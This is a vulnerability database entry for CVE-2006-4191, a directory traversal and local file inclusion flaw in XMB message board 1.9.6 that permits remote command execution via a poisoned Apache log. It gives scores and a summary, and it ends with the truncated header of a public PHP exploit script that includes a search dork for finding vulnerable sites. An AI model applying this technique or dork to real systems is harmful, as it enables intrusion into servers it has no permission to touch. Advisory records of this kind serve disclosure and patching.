5.1
CVSSv2

CVE-2006-4191

Published: 17/08/2006 Updated: 29/04/2021
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and previous versions allows remote malicious users to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.

Vulnerable Product Search on Vulmon Subscribe to Product

xmb software extreme message board

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "XMB <= 196 Final basename() 'langfilenew' arbitrary local inclusion / remote commands xctn\n"; echo "by rgod rgod@autisticiorg\n"; echo "site: retrogodaltervistaorg\n"; echo "dork: \"Powered by XMB\"\n\n"; /* works regardless of phpini settings */ if ($argc<6) { echo "Usage: ph ...